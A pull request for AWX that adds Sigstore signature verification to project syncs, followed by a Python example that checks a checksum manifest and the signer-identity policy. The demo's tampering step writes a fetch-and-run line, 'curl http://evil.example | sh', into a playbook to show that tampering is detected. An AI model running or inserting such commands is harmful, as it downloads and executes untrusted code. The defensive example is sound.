
Verify Sigstore signature on project sync #14193

Draft: wants to merge 3 commits into base: devel

Conversation

mayaCostantini
Contributor

SUMMARY

Introduce Sigstore signature verification for projects on update as part of the roadmap for Sigstore integration in the Ansible ecosystem.

What is Sigstore?

This section is a short introduction to project Sigstore. For more information, refer to the project documentation.

Project Sigstore is a new standard for signing, verifying and protecting software that solves the following issues:

  • Key management: Sigstore solves the issue of private key storage and revocation by providing “keyless” signatures for software artifacts, eliminating the need for the user to store private GPG keys which could eventually become compromised.

  • Identity-based signatures: Sigstore generates free, short-lived signing certificates based on identities, delegating the authentication part to an OIDC provider (Google, GitHub, Microsoft…).

  • An immutable Transparency Log (Rekor) for signature and provenance attestations is used to store signature entries and facilitate verification and audits in case of identity compromise.

The Sigstore signature verification workflow for projects would exist in parallel with the current implementation for GPG signature verification.

Sigstore provides “keyless” signing for software artifacts, where a signer can connect to an OIDC provider and Sigstore will produce an ephemeral signing certificate and store a signature entry in an immutable transparency log queried during signature verification.

Changes introduced by this PR

This change allows verifying a project's Sigstore signature, generated with ansible-sign (the change to support this in the CLI can be seen here), during a sync.

A new Credential type, sigstore, is introduced to define the parameters for verifying a project signature:

  • Rekor instance URL: The URL of the Sigstore Rekor instance the signatures were logged to
  • TUF instance URL: The URL of the TUF instance used to retrieve Rekor and Fulcio public keys
  • Rekor root public key: The PEM public key for the Rekor instance
  • Fulcio certificate chain: Chain of PEM CA certificates to verify the Fulcio signing certificate
  • Sigstore certificate identity: The OIDC identity of the signer to look for in the certificate SAN (e.g. an email address or a GitHub Actions workflow)
  • Sigstore OIDC provider URL: The URL of the OIDC provider that issued the signer identity
  • Sigstore GitHub Actions trigger: The GitHub Actions event name that triggered the workflow
  • Sigstore git commit SHA: The git commit SHA that the workflow run was invoked with
  • Sigstore GitHub workflow name: The name of the workflow that was triggered
  • Sigstore GitHub repository: The repository slug that the workflow was triggered under
  • Sigstore GitHub ref: The git ref that the workflow was invoked with
  • Sigstore verify offline: Verify signatures offline (default: False)

Here is an overview of the configuration options for this type of credential:

[screenshot: sigstore_credential_awx]

When launching a project sync, if enabled, the job will look for a checksums manifest and for Sigstore signature materials under .ansible-sign/ and will succeed only if the signature was successfully verified:

[screenshot: sigstore_sync_ok]

ISSUE TYPE
  • New or Enhanced Feature
COMPONENT NAME
  • API
  • UI
  • Collection
  • Docs
AWX VERSION
awx: 22.3.1.dev72+g693541633a
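The two checks the PR describes, a checksum manifest under .ansible-sign/ and an identity policy built from the credential's "Sigstore ..." fields, as an added example that is not code from this PR, from AWX or from ansible-sign. It assumes ansible-sign's manifest layout (.ansible-sign/sha256sum.txt in sha256sum(1) format) and takes the signing certificate's claims as an already-extracted dict keyed by the Fulcio extension OIDs, because parsing the X.509 certificate, checking the signature and looking up the Rekor entry is the job of the sigstore library and is left out here. The SigstoreCredential class, run_demo() and the project files are constructed for the example.

```python
import hashlib
import os
import tempfile
from dataclasses import dataclass
from typing import Dict, List, Optional

# Fulcio certificate extension OIDs for the claims the credential can pin
# (Fulcio OID registry; .1.8 is the v2 issuer extension).
OID_ISSUER_V2 = "1.3.6.1.4.1.57264.1.8"
OID_GITHUB_TRIGGER = "1.3.6.1.4.1.57264.1.2"
OID_GITHUB_SHA = "1.3.6.1.4.1.57264.1.3"
OID_GITHUB_WORKFLOW = "1.3.6.1.4.1.57264.1.4"
OID_GITHUB_REPOSITORY = "1.3.6.1.4.1.57264.1.5"
OID_GITHUB_REF = "1.3.6.1.4.1.57264.1.6"
SAN = "subjectAltName"  # key used here for the identity in the certificate SAN
MANIFEST_PATH = os.path.join(".ansible-sign", "sha256sum.txt")  # assumption: ansible-sign layout


@dataclass
class SigstoreCredential:
    """Identity-related fields of the PR's 'sigstore' credential type (hypothetical class)."""
    certificate_identity: str
    oidc_issuer: str
    github_trigger: Optional[str] = None
    git_commit_sha: Optional[str] = None
    github_workflow_name: Optional[str] = None
    github_repository: Optional[str] = None
    github_ref: Optional[str] = None

    def expected_claims(self) -> Dict[str, str]:
        """Claims the certificate must carry; optional fields left unset are not enforced."""
        expected = {SAN: self.certificate_identity, OID_ISSUER_V2: self.oidc_issuer}
        optional = {OID_GITHUB_TRIGGER: self.github_trigger, OID_GITHUB_SHA: self.git_commit_sha,
                    OID_GITHUB_WORKFLOW: self.github_workflow_name,
                    OID_GITHUB_REPOSITORY: self.github_repository, OID_GITHUB_REF: self.github_ref}
        expected.update({k: v for k, v in optional.items() if v is not None})
        return expected


def check_identity(cert_claims: Dict[str, str], credential: SigstoreCredential) -> List[str]:
    """Return policy violations (empty list = match). A pinned claim that is absent from the
    certificate is a failure, not a pass: a valid signature by the wrong identity must not verify."""
    failures = []
    for key, wanted in credential.expected_claims().items():
        got = cert_claims.get(key)
        if got != wanted:
            failures.append(f"{key}: expected {wanted!r}, certificate has {got!r}")
    return failures


def parse_manifest(text: str) -> Dict[str, str]:
    """Parse sha256sum(1) output: '<hex>  <path>' (or '<hex> *<path>' in binary mode)."""
    entries = {}
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        digest, sep, path = line.partition(" ")
        if not sep or len(digest) != 64:
            raise ValueError(f"manifest line {lineno}: malformed entry")
        entries[path[1:] if path[:1] in (" ", "*") else path] = digest.lower()
    return entries


def sha256_file(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_manifest(project_dir: str) -> List[str]:
    """Check every manifest entry against the tree. Call this only AFTER the Sigstore signature
    over the manifest has verified: an unsigned manifest proves nothing about the files."""
    try:
        with open(os.path.join(project_dir, MANIFEST_PATH), encoding="utf-8") as f:
            entries = parse_manifest(f.read())
    except (OSError, ValueError) as exc:
        return [f"manifest unusable: {exc}"]
    failures = []
    for rel, digest in entries.items():
        if os.path.isabs(rel) or ".." in rel.replace("\\", "/").split("/"):
            failures.append(f"{rel}: refusing path outside the project tree")
        elif not os.path.isfile(os.path.join(project_dir, rel)):
            failures.append(f"{rel}: listed in manifest but missing")
        elif sha256_file(os.path.join(project_dir, rel)) != digest:
            failures.append(f"{rel}: digest mismatch")
    # A manifest only protects what it lists, so unlisted files are surfaced too
    # (this example's choice; an injected playbook should not slip in silently).
    for dirpath, _, names in os.walk(project_dir):
        for name in names:
            rel = os.path.relpath(os.path.join(dirpath, name), project_dir)
            if rel not in entries and not rel.startswith(".ansible-sign"):
                failures.append(f"{rel}: present in tree but not in manifest")
    return failures


def run_demo():
    """Constructed project tree: verify clean, then tampered; then evaluate the identity policy."""
    cred = SigstoreCredential(
        certificate_identity="https://github.com/example-org/playbooks/.github/workflows/sign.yml@refs/heads/main",
        oidc_issuer="https://token.actions.githubusercontent.com",
        github_repository="example-org/playbooks", github_trigger="push")
    good = {SAN: cred.certificate_identity, OID_ISSUER_V2: cred.oidc_issuer,
            OID_GITHUB_REPOSITORY: "example-org/playbooks", OID_GITHUB_TRIGGER: "push",
            OID_GITHUB_REF: "refs/heads/main"}
    bad = {**good, OID_GITHUB_TRIGGER: "pull_request"}  # signed from an untrusted trigger
    files = {"site.yml": b"- hosts: all\n  tasks: []\n", "roles/common/tasks/main.yml": b"---\n"}
    with tempfile.TemporaryDirectory() as root:
        for rel, data in files.items():
            os.makedirs(os.path.dirname(os.path.join(root, rel)), exist_ok=True)
            with open(os.path.join(root, rel), "wb") as f:
                f.write(data)
        os.makedirs(os.path.join(root, ".ansible-sign"))
        with open(os.path.join(root, MANIFEST_PATH), "w", encoding="utf-8") as f:
            f.write("".join(f"{hashlib.sha256(d).hexdigest()}  {p}\n" for p, d in files.items()))
        clean = verify_manifest(root)
        with open(os.path.join(root, "site.yml"), "ab") as f:
            f.write(b"  - shell: curl http://evil.example | sh\n")  # tampering after signing
        tampered = verify_manifest(root)
    return clean, tampered, check_identity(good, cred), check_identity(bad, cred)


if __name__ == "__main__":
    print(run_demo())
```

The order matters: the signature over the manifest (and its Rekor entry, when "verify offline" is not set) must be checked before the manifest is trusted, and the identity policy must be applied to the certificate that signature verified under, otherwise any valid Sigstore signature from any identity would pass.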

mayaCostantini marked this pull request as draft July 3, 2023 09:33
github-actions bot added the labels component:api, component:awx_collection (issues related to the collection for controlling AWX) and community Jul 3, 2023
AlanCoding requested a review from relrod July 5, 2023 15:17
github-actions bot added the label dependencies (Pull requests that update a dependency file) Aug 28, 2023
mayaCostantini marked this pull request as ready for review October 6, 2023 07:47
dmzoneill marked this pull request as draft February 19, 2024 15:44